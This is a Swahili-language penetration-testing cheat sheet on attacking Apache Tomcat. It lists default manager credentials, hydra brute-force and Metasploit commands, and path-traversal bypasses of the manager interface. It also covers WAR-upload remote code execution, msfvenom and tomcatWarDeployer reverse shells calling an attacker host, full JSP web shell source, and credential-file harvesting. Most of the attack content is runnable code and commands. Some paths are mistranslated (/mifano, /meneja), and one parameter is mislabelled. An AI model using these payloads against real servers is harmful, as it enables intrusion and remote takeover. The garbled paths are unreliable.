Kikundi cha Usalama cha Try Hard

Ugunduzi

• Kawaida inaendeshwa kwenye bandari 8080

• Kosa la kawaida la Tomcat:

Uorodheshaji

Uthibitisho wa Toleo

Ili kupata toleo la Apache Tomcat, amri rahisi inaweza kutekelezwa:

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

Mahali pa Faili za Meneja

Kutambua maeneo sahihi ya /meneja na /mwenyeji-meneja ni muhimu kwani majina yao yanaweza kubadilishwa. Tafutizo la nguvu linapendekezwa ili kutambua kurasa hizi.

Uorodhishaji wa Majina ya Mtumiaji

Kwa toleo la Tomcat la zamani kuliko 6, inawezekana kuorodhesha majina ya mtumiaji kupitia:

msf> use auxiliary/scanner/http/tomcat_enum

Maelezo ya Sera za Kuingia za Chaguo-msingi

/manager/html directory ni hasa nyeti kwani inaruhusu kupakia na kupeleka faili za WAR, ambazo zinaweza kusababisha utekelezaji wa nambari. Directory hii inalindwa na uthibitishaji wa HTTP wa msingi, na maelezo ya kuingia ya kawaida ni:

• admin:admin

• tomcat:tomcat

• admin:

• admin:s3cr3t

• tomcat:s3cr3t

• admin:tomcat

Maelezo haya ya kuingia yanaweza kujaribiwa kutumia:

msf> use auxiliary/scanner/http/tomcat_mgr_login

Directory nyingine inayostahili kuzingatiwa ni /manager/status, ambayo inaonyesha toleo la Tomcat na OS, ikisaidia kutambua udhaifu.

Shambulio la Nguvu Kubwa

Kujaribu shambulio la nguvu kwenye directory ya meneja, mtu anaweza kutumia:

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

Makosa Yanayoweza Kutokea

Kufichua Nywila ya Nyuma

Kupata /auth.jsp kunaweza kufichua nywila katika nyuma chini ya hali za bahati.

Ukodishaji wa URL Mara Mbili

Udhaifu wa CVE-2007-1860 katika mod_jk huruhusu ukodishaji wa URL mara mbili kwa njia ya kuvuka njia, ikiruhusu ufikiaji usiohalali kwenye kiolesura cha usimamizi kupitia URL iliyoandaliwa kwa makini.

Ili kupata wavuti ya usimamizi ya Tomcat enda: pathTomcat/%252E%252E/manager/html

/mifano

Toleo la Apache Tomcat 4.x hadi 7.x lina skripti za mfano ambazo zinaweza kufichua habari na kushambuliwa na mashambulizi ya msalaba wa tovuti (XSS). Skripti hizi, zilizoorodheshwa kwa kina, zinapaswa kuchunguzwa kwa ufikiaji usiohalali na uwezekano wa kutumiwa vibaya. Pata maelezo zaidi hapa

• /mifano/jsp/num/numguess.jsp

• /mifano/jsp/dates/date.jsp

• /mifano/jsp/snp/snoop.jsp

• /mifano/jsp/error/error.html

• /mifano/jsp/sessions/carts.html

• /mifano/jsp/checkbox/check.html

• /mifano/jsp/colors/colors.html

• /mifano/jsp/cal/login.html

• /mifano/jsp/include/include.jsp

• /mifano/jsp/forward/forward.jsp

• /mifano/jsp/plugin/plugin.jsp

• /mifano/jsp/jsptoserv/jsptoservlet.jsp

• /mifano/jsp/simpletag/foo.jsp

• /mifano/jsp/mail/sendmail.jsp

• /mifano/servlet/HelloWorldExample

• /mifano/servlet/RequestInfoExample

• /mifano/servlet/RequestHeaderExample

• /mifano/servlet/RequestParamExample

• /mifano/servlet/CookieExample

• /mifano/servlet/JndiServlet

• /mifano/servlet/SessionExample

• /tomcat-docs/appdev/sample/web/hello.jsp

Udanganyifu wa Njia

Katika mipangilio inayoweza kudhurika ya Tomcat unaweza kupata ufikiaji kwenye saraka zilizolindwa kwenye Tomcat kwa kutumia njia: /..;/

Kwa hivyo, kwa mfano, unaweza kupata ukurasa wa msimamizi wa Tomcat kwa kufikia: www.vulnerable.com/lalala/..;/manager/html

Njia nyingine ya kuzidi njia zilizolindwa kwa kutumia hila hii ni kufikia http://www.vulnerable.com/;param=value/manager/html

RCE

Hatimaye, ikiwa una ufikiaji kwenye Meneja wa Programu ya Wavuti ya Tomcat, unaweza kupakia na kutekeleza faili ya .war (kutekeleza nambari).

Vizuizi

Utaweza tu kutekeleza WAR ikiwa una mamlaka za kutosha (majukumu: admin, manager na manager-script). Maelezo hayo yanaweza kupatikana chini ya tomcat-users.xml kawaida iliyoainishwa katika /usr/share/tomcat9/etc/tomcat-users.xml (inatofautiana kati ya toleo) (angalia POST sehemu).

# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

Metasploit ni chombo cha nguvu cha kufanya uchambuzi wa usalama na kufanya mashambulizi ya kimaendeleo. Inatoa moduli nyingi zilizojengwa kwa ajili ya kutekeleza mashambulizi dhidi ya programu-jalizi za Tomcat. Unaweza kutumia Metasploit kwa ufanisi kugundua na kuchunguza mapungufu katika mifumo ya Tomcat.

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

Kitanzi cha Nyuma cha MSFVenom

1. Unda vita kwa ajili ya kupeleka:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war

2. Pakia faili ya revshell.war na ufikie (/revshell/):

Bind na reverse shell na tomcatWarDeployer.py

Katika hali fulani hii haifanyi kazi (kwa mfano toleo za zamani za sun)

Pakua

git clone https://github.com/mgeeky/tomcatWarDeployer.git

Kitanzi cha Nyuma

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

Bind shell

Shell ya Kufunga

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

Kutumia Culsterd

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

Mbinu ya kawaida - Web shell

Unda index.jsp na maudhui haya:

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>

mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it

Unaweza pia kusakinisha hii (inaruhusu kupakia, kupakua na utekelezaji wa amri): http://vonloesch.de/filebrowser.html

Mbinu ya Mikono 2

Pata ganda la wavuti la JSP kama hili na unda faili ya WAR:

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp

POST

Jina la faili ya siri ya Tomcat ni tomcat-users.xml

find / -name tomcat-users.xml 2>/dev/null

Njia nyingine za kukusanya sifa za Tomcat:

msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

Vifaa vingine vya uchunguzi wa tomcat

• https://github.com/p0dalirius/ApacheTomcatScanner

Marejeo

• https://github.com/simran-sankhala/Pentest-Tomcat

• https://hackertarget.com/sample/nexpose-metasploitable-test.pdf

Kikundi cha Usalama cha Kujitahidi